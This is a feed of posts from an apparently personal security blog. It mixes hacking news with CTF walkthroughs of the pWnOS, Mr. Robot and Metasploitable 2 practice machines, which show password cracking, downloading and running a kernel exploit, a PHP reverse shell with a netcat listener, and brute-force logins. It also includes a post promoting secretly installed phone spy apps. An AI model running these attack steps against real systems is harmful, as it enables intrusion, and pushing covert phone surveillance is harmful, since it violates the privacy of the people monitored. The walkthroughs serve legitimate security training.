
Facebook, Instagram, and WhatsApp are all experiencing issues this morning for users worldwide. Facebook and Instagram are both inaccessible, with news feeds refusing to refresh and the main Facebook.com domain unavailable.

Reports on Twitter suggest that some users are unable to send or receive messages on WhatsApp. On Instagram, feeds refuse to load or refresh.

The post Facebook, WhatsApp, Instagram Down Worldwide appeared first on Kamran Mohsin.



On 14 February 2019, a convoy of vehicles carrying security personnel on the Jammu Srinagar National Highway was attacked by a vehicle-borne suicide bomber at Lethpora (near Awantipora) in the Pulwama district, Jammu and Kashmir, India.

In retaliation, the Indian I Crew team hacked into several Pakistani websites to show their anger.

In the meantime, I Crew hacked into the portal of one of Pakistan’s renowned universities. The team uploaded the following defacement.

I Crew shared their message on the defaced page.

Don’t trust your development. Minor bugs can result in reputation or financial damage.

The post Riphah University Admission Portal Hacked appeared first on Kamran Mohsin.


It’s been a long time since I wrote a blog post. I hope to continue writing this time, starting with a vulnerable machine walkthrough.

You can easily download the image for this VM from VulnHub.

The walkthrough is detailed. Let’s start with this machine.

I have already hosted this virtual machine in VMware Workstation. You will see the screen below once you start the pWnOS machine, whether in VMware Workstation or in a virtual machine.

pWnOS machine booted

I have already logged into my Kali machine. It’s time to get the IP address of the pWnOS machine using netdiscover, a command-line utility that ships with Kali, as seen below:

netdiscover

Knowing which services run on the target machine helps map its attack surface. We use Nmap, a command-line utility, to find the services running on the various ports of the target system.

nmap

Various ports are open. We see that a MiniServ 0.01 (Webmin httpd) server is running on port 10000; after googling, I found that the target system is using a vulnerable version. Luckily, I found an exploit in Metasploit.

available exploit

1st Method

Using the highlighted auxiliary module.

We see that the RPATH variable is set to /etc/passwd by default; let’s extract it:

/etc/passwd

Now set the RPATH variable to /etc/shadow and extract it too:

/etc/shadow

We got 5 hashes from the shadow file. Save the hashes in a shadow.txt file, as shown in the command below.

John the Ripper, a command-line utility, will help crack them with the following command:

john --wordlist=/usr/share/wordlists/rockyou.txt --fork=5 shadow.txt

Luckily, John cracked 1 hash out of 5.

This cracked hash let us log in via SSH, as shown below:

Let’s see what rights/privileges the vmware user has:

As we saw, vmware has no rights/privileges, so we investigate the kernel further.

After googling, we found the following exploit for the vulnerable kernel version; you can easily find it in Kali via searchsploit.

Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)

I have started the apache2 web server on my Kali machine to host this exploit publicly, using the following command:

service apache2 start

Copy the exploit to web server.

cp /usr/share/exploitdb/exploits/linux/local/5092.c /var/www/html/

Now download the exploit onto the victim machine via the limited shell, and then compile the C program with the gcc compiler, which is pre-installed in Linux.

wget http://192.168.10.8/5092.c
gcc 5092.c -o exploit
./exploit

Hurray we got into root 😉

2nd Method

There is another method too. When we came across /etc/passwd, we saw that a few users were listed at the very end. Each user can log in to pWnOS via SSH. Each user has authorized keys that are present in the root directory but in a hidden directory, .ssh; let’s get them via the RPATH variable.

authorized key of vmware user

You might be wondering why we are interested in the authorized keys. Well, in this scenario we are lucky enough to have a file disclosure vulnerability, so we have access to the authorized keys file placed in the home directory of each user. Each authorized key is mapped to an RSA key.

Now, where do we get the RSA keys? Good question 😀 Google solved this problem too. The link below has a repository of keys for both 1024 and 2048 bits. Here we need the 2048-bit RSA keys.

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

The command below will download the set of RSA keys. I have already downloaded it onto my Kali machine.

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

Now extract the file with the following command:

tar vxjf 5622.tar.bz2

It’s time for brute forcing (finding the matching combination of authorized key and RSA key).

cd rsa
grep -lr authorized_key

We got it. Now log in via SSH and run the local privilege escalation exploit as we did in the 1st method.

ssh -i 2048/d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.10.10

Hurray we got into root again 😀
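The 2nd method works because a public key listed in authorized_keys belongs to a published set of key pairs. The following added example (not part of the original post) audits authorized_keys content against a blocklist of known-weak key fingerprints; the blocklist format (colon-free MD5 hex of the decoded key blob), the function names and the sample keys are assumptions constructed for illustration.

```python
import base64
import hashlib

KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-")


def fingerprints(blob_b64):
    """Return (md5_hex, sha256_b64) for a base64-encoded public-key blob."""
    blob = base64.b64decode(blob_b64, validate=True)
    md5_hex = hashlib.md5(blob).hexdigest()
    sha256 = base64.b64encode(hashlib.sha256(blob).digest()).decode()
    return md5_hex, sha256.rstrip("=")


def parse_authorized_keys(text):
    """Yield (line_no, key_type, blob_b64, comment) for each key line.

    Leading options such as command="..." are skipped by scanning for the
    first field that looks like a key type.
    """
    for line_no, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        for i, field in enumerate(fields[:-1]):
            if field.startswith(KEY_TYPES):
                yield line_no, field, fields[i + 1], " ".join(fields[i + 2:])
                break


def audit(text, weak_md5):
    """Return (line_no, status, comment) for weak or unparseable entries."""
    findings = []
    for line_no, _key_type, blob_b64, comment in parse_authorized_keys(text):
        try:
            md5_hex, _sha256 = fingerprints(blob_b64)
        except ValueError:  # binascii.Error is a ValueError subclass
            findings.append((line_no, "unparseable", comment))
            continue
        if md5_hex in weak_md5:
            findings.append((line_no, "known-weak", comment))
    return findings


def _blob(raw):
    return base64.b64encode(raw).decode()


# Constructed stand-ins for key blobs; these are not real SSH keys.
BLOB_A = _blob(b"constructed-key-A")
BLOB_B = _blob(b"constructed-key-B")
SAMPLE = "\n".join([
    "# constructed authorized_keys content",
    "ssh-rsa " + BLOB_A + " vmware@constructed",
    'command="/bin/true",no-pty ssh-rsa ' + BLOB_B + " backup@constructed",
    "ssh-rsa not*base64 broken@constructed",
])
# Constructed blocklist: pretend key B is in the published weak-key set.
WEAK_MD5 = {fingerprints(BLOB_B)[0]}

if __name__ == "__main__":
    for finding in audit(SAMPLE, WEAK_MD5):
        print(finding)
```

Any entry reported as known-weak should be removed from authorized_keys and the key pair regenerated on a patched system.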

If you are interested in reading about the configuration of SSH key-based authentication on a Linux server, do read my blog post here.

Thanks for stopping by. If you like this blog post, do leave a comment below.

The post pWnOS: 1.0 Vulnerable Machine Walkthrough appeared first on Kamran Mohsin.


On Monday, Zerodium, a startup that buys and sells hacking tools and exploits to governments around the world, announced price increases for almost everything they are looking for, such as iOS remote jailbreaks and Windows exploits. It said it will now pay security researchers $1,000,000 for exploits in WhatsApp, iMessage, and SMS/MMS apps for all mobile operating systems.

“Messaging apps in general and WhatsApp in particular are sometimes the only communication channel used by targets and end-to-end encryption makes it difficult for our government customers to intercept such communications,” Zerodium’s founder Chaouki Bekrar told Motherboard in an online chat. “So having the ability to remotely compromise these apps directly without compromising the whole phone is much more strategic and effective.”

Read complete article on Vice.com

The post Get $1 Million for Hacking WhatsApp and iMessage appeared first on Kamran Mohsin.


The US National Counter-Intelligence and Security Center, which is responsible for security and counter-intelligence efforts, has started a campaign against the cyber threats spreading across companies in the US. Despite all these threats and menaces, the companies haven’t taken serious measures to protect themselves against cyber attacks.

The Trump administration on Monday launched a drive to push US firms to better protect their trade secrets from foreign hackers, following a slew of cases accusing individuals and companies of economic espionage for China.

US companies hit by recent attacks include Hewlett Packard Enterprise Co and International Business Machines Corp.

The US National Counter-Intelligence is worried about cyber attacks on US government agencies and the private sector from China, Russia, North Korea and Iran.

The post Trump Administration Forces Major Firms to Protect Their Trade Secrets From Foreign hackers appeared first on Kamran Mohsin.


An alleged hacker who reportedly threatened to sell the personal details of 319 million iCloud users is having his day in court. IT analyst Kerem Albayrak, 21, filmed himself accessing accounts and posted the footage on YouTube, it was said.

Albayrak, who is Turkish, works as a freelancer and founded the firms Vasinity Digital and Verticle Media.

He then allegedly demanded more than $174,000 worth of Bitcoin and $1,100 iTunes vouchers from tech giant Apple in return for calling off his plan.

The post Alleged hacker threatens Apple to sell details of 319 million Apple iCloud users appeared first on Kamran Mohsin.


The digital revolution has immensely influenced our lives, and today we depend heavily on cell phones, gadgets, and computers. All of these tech inventions have made our lives easier than ever before. Now we can make long and short cell phone calls at cheap rates, and we can use social media apps such as Facebook, Yahoo, Line, Vine, Tinder, WhatsApp, Snapchat, and plenty of others.

Social media apps enable a user to hold chat conversations, send text messages, share media files such as photos and videos and, last but not least, send voice messages through WhatsApp, IMO, Facebook and Telegram. Despite all these advantages, the young generation is getting trapped by cyber predators such as cyberbullies. Online bullies are present on social messaging apps in large numbers, always looking to approach young kids and teens to tease, squeeze and humiliate them online. Therefore, parents feel really concerned about the online protection of their children.

Effects of cyber bullying on children

Online bullying has dangerous effects: children, teens and even adults all feel very distressed and alone when bullied online. Victims of cyberbullying feel helpless, overwhelmed and embarrassed, and they have to live through this unpleasant time; most victims, such as teens, feel ashamed of themselves and are not able to deal with it.

Young kids and teens who are victims of online bullying don’t want to return to the place where they have been bullied, such as a particular social media platform or, in real life, school. They remain under a continuous source of stress and worry, and they may develop health issues such as depression, anxiety, and psychotic disorders. Young teens have reportedly attempted suicide a number of times after being bullied online or in real life.

Cyber Bullying stats

  • 20% of the young kids and teens who are bullied online don’t want to go to the place where they were bullied, either online or in real life
  • 5% of the victims start self-harming activities
  • 3% of the victims, especially teens, commit suicide after being bullied online
  • Young kids and teens are more likely to be bullied online while using the Facebook social media app
  • 28% of teens and kids have reportedly been bullied online using Twitter

Protect children from cyber bullying using parental control app

First and foremost, subscribe to a cell phone spy app, and you will get an email that contains credentials. Next, get access to the target device and install the mobile phone monitoring app on it. When the installation is done, activate the app on the target device. Before you complete the process, you will get a message on the screen asking whether or not you want to use it secretly on the target device. Choose the best option and activate it on the target device. You then need the passcode and ID to get access to the online control panel of the mobile phone surveillance software. Once you have access to the dashboard of the mobile phone tracking app, use its tools to monitor your kids and teens and protect them from cyberbullying.

Use Android monitoring app tools & protect teens from bullying

You can monitor IM and social media apps and view IM logs such as chat conversations, text messages, audio and video conversations, shared media such as photos and videos, and voice messages. You can monitor live calls with the secret call recorder and record and listen to them. You can also view text messages with the text message spy and see SMS, MMS and heads-up ticker notifications. You can do live screen recording of all the instant messaging apps and get to know your children’s social media activities. Furthermore, you can remotely control your children’s activities and protect them from all online dangers and cyber predators, including cyberbullies, with the remote phone controller. You can view installed apps, block text messages, block incoming calls and block access to the internet on the target cell phone. Moreover, you can track the location of kids and teens with the GPS location tracker if they don’t come home after being bullied online or in real life. This will help you track their current and exact location.

Conclusion:

If you’re worried about your children’s digital activities, especially on social media apps, and you don’t want your kids to be victims of cyberbullying, then you need to use the mobile phone spy app for Android and stay updated about your kids’ and teens’ cell phone activities connected to the internet.

Are you interested in reading about the exploitation of the vulnerable machine “Mr. Robot”? Click here to read the complete walkthrough.

Thinking to write and share guest blogs on kamranmohsin.com? Click here.

The post How to safeguard your Kids from Cyber bullying? appeared first on Kamran Mohsin.


Mr. Robot is a vulnerable machine with several open ports. The goal is to break the security of the target machine and find the 3 keys stored on it. The walkthrough is explained below in detail.

Once you fire up the Mr. Robot VM in VirtualBox or VMware Workstation/Player, you will get the screen below.

You can download Mr. Robot virtual machine from here.

Okay let’s try to break into the machine, hope you enjoy the journey with me 😀

1. Discover all the live hosts in a network with netdiscover.

2. Discover the open ports and the applications running on them with nmap.

3. Discover all the directories on web server using dirb.

4. Check robots.txt file.

5. We got key 1 (out of 3 keys) that was placed in robots.txt file.

6. We found another file, fsocity.dic, that was also listed in robots.txt. After opening it, we found that it is a wordlist with duplicated data. Therefore, we compiled the unique entries and saved them in shortfsocity.dsc.

Note: Target IP is changed below; it’s 192.168.1.46 and the local IP of my attacker [Kali] machine is 192.168.1.54

7. For http-post-form, we got an HTTP POST request form.

8. After a little research with nikto and source code analysis, we found that the website is running WordPress, so we jumped onto /wp-admin or wp-login and tried fuzzing. The result was not good enough, so we used fsocity.dic as a wordlist in hydra to brute-force the username and password.

9. We successfully got the username and, using the same wordlist file, started looking for the password.

10. The username and password we got are Elliot and ER29-0652. Log in through wp-login and see what is interesting in the WordPress dashboard. Luckily, we got into the dashboard; now try to upload a reverse shell for a remote connection. We uploaded Pentestmonkey’s PHP reverse shell in a zip.

11. Unfortunately, I did not get a remote connection (shell) through plugins. I copied the PHP reverse shell code and pasted it into the 404 page, and the code worked successfully.
Note: The IP should be that of your Kali machine.

12. Open netcat connection first on port 1234 that was specified in the php reverse shell code.

Open any random page on target IP that does not exist.

13. Let us see which shell we got with netcat.

14. We got a limited shell. Now we try for a bash shell. For that, we check whether Python is installed on the target system. We spawned a bash shell and got access to the daemon account.

15. We got key 2 file but we didn’t have permissions to open it. We got access to another file that has a secret hash.

16. Let us try to break the hash first.

17. The hash was cracked and we got password of robot account that has access to key 2 file.

18. After getting 2 keys, we moved into the root folder, but we were not able to open the key 3 file because of the limited privileges assigned to the robot account.
We check whether the applications running on the target system can be used to get access to the root account.

19. Look for any outdated service running on the target system that we mounted in the tmp directory.

20. Luckily, we found nmap (version 5.3.4) on the target system, which provides an interactive shell that gives root access.

21. Through nmap (interactive mode), we obtained key 3 (out of 3 keys) in the root folder, which only a root account can access.

Congratulations !!!

Here is the root flag. Hope to see you soon … !!!
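A defender's check for the condition behind steps 18 to 21, added here as an example and not part of the original post: it lists setuid-root files and flags those that can hand out a shell. It assumes the nmap binary on the VM was installed setuid root, which the post does not state; the watchlist and the sample entries are constructed.

```python
import os
import stat

# Assumed watchlist (not from the post): programs with a shell escape or a
# command-execution feature. nmap is the one the walkthrough ran into.
SHELL_CAPABLE = {"nmap", "vim", "vi", "find", "less", "more", "awk",
                 "perl", "python", "bash", "sh"}


def collect(roots):
    """Yield (path, st_mode, st_uid) for every file under the given roots.

    Symlinks are not followed and unreadable paths are skipped.
    """
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                yield path, st.st_mode, st.st_uid


def flag_setuid(entries, owner_uid=0, watchlist=SHELL_CAPABLE):
    """Return sorted (level, path) for regular setuid files owned by owner_uid.

    'high' means the file name is on the shell-capable watchlist;
    'review' means any other setuid file that should be justified.
    """
    findings = []
    for path, mode, uid in entries:
        if not stat.S_ISREG(mode):
            continue
        if not mode & stat.S_ISUID or uid != owner_uid:
            continue
        level = "high" if os.path.basename(path) in watchlist else "review"
        findings.append((level, path))
    return sorted(findings)


# Constructed entries (path, mode, uid) standing in for a filesystem walk.
CONSTRUCTED_ENTRIES = [
    ("/usr/local/bin/nmap", 0o104755, 0),   # setuid root, shell-capable
    ("/usr/bin/passwd", 0o104755, 0),       # setuid root, expected on Linux
    ("/bin/ls", 0o100755, 0),               # not setuid
    ("/home/robot/tool", 0o104755, 1002),   # setuid, but not owned by root
    ("/usr/bin/vi", 0o120777, 0),           # symlink, ignored
]

if __name__ == "__main__":
    for level, path in flag_setuid(collect(["/usr", "/bin", "/sbin"])):
        print(level, path)
```

Removing the setuid bit from tools that do not need it closes the path used in step 20.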

Read another CTF here. More CTFs are coming soon.

If you are interested in writing guest blogs, please visit this page.

The post Privilege Escalation in Mr. Robot CTF appeared first on Kamran Mohsin.

Top 75 Hacking Websites and Blogs for Hackers

The Kamran Mohsin blog has been selected for the top 75 hacker blog list by Feedspot.

I got a personal mail from the founder of Feedspot:

“I would like to personally congratulate you as your blog Kamran Mohsin has been selected by our panelist as one of the Top 75 Hacker Blogs on the web.
I personally give you a high-five and want to thank you for your contribution to this world. This is the most comprehensive list of Top 75 Hacker Blogs on the internet and I’m honored to have you as part of this!
Also, you have the honor of displaying the following badge on your blog. Use the below code to display this badge proudly on your blog.”

Message from Anuj Agarwal; founder of Feedspot:

The Best Hacker blogs from thousands of Cyber Security blogs in our index using search and social metrics.

We’ve carefully selected these websites because they are actively working to educate, inspire, and empower their readers with frequent updates and high-quality information.

These blogs are ranked based on following criteria:

  • Google reputation and Google search ranking
  • Influence and popularity on Facebook, twitter and other social media sites
  • Quality and consistency of posts.
  • Feedspot’s editorial team and expert review

Top 75 Hacker Blogs Winners

CONGRATULATIONS to every blogger that has made this Top Hacker Blogs list! This is the most comprehensive list of best Hacker blogs on the internet and I’m honoured to have you as part of this! I personally give you a high-five and want to thank you for your contribution to this world.

If your blog is one of the Top 75 Hacker blogs, you have the honour of displaying the following badge on your site. Use the below code to display this badge proudly on your blog. You deserve it!

The post Kamran Mohsin awarded Top 75 Hacker Blog on Internet by Feedspot appeared first on Kamran Mohsin.


After a break of months, I finally urged myself to start writing information security blogs again. I hope to do my best to deliver valuable information to my readers. This time I’ll be starting with walkthroughs and privilege escalation of vulnerable machines / capture the flag (CTF).

I picked the Metasploitable virtual machine, an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Metasploitable version 2 can be downloaded from here. This virtual machine is compatible with VirtualBox, VMware, and other common virtualization platforms. In this blog, we will try our best to cover privilege escalation on the Metasploitable 2 machine.

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user – read more.

Note: For privilege escalation, we should get a limited shell first.

In Metasploitable 2, we can get a limited shell through various services running on the system.

1. We used nmap (Network Mapper) to search for running services, and ended up finding telnet running with the default username and password on Metasploitable 2.

Telnet is a program used to establish a connection between two computers. It is inherently insecure because it transmits data in clear text.

On the Kali box, open a terminal, and telnet to the Metasploitable VM. Log in with the ‘msfadmin:msfadmin’ credentials.

2. The logged-in user is msfadmin (not the root account).

3. The following is the Linux version (outdated).

4. Looking at the Linux kernel version, I googled for an exploit. Luckily, I found an exploit for it.
https://www.exploit-db.com/exploits/8572/

5. I downloaded the exploit and, using the vim utility, saved it in the file exploit. After that, I converted the file to the .c extension (C language).

6. Let us see the exploit.

7. Compile the C file into the binary file exploit with the gcc utility.

8. Search for any process running with a PID. We can use any PID (but it should be non-zero).

9. Confirm the process ID (PID). It should be increased by one in the following mode.

10. The exploit for kernel will use/run the below code to run as a root user once a Netcat connection has been established.

11. Open a netcat connection on port 1337 (assigned in tmp/run file). Launch exploit with the PID 2770 (shown above). We successfully got a bash shell on target system.

Hurrah, we did it. I look forward to sharing more CTFs with you. I’d like to hear from you; share your thoughts in the comments area below.

If you are interested in learning about ethical hacking and penetration testing, I would like you to read the following blog.

The post Privilege Escalation in Metasploitable 2 Machine appeared first on Kamran Mohsin.
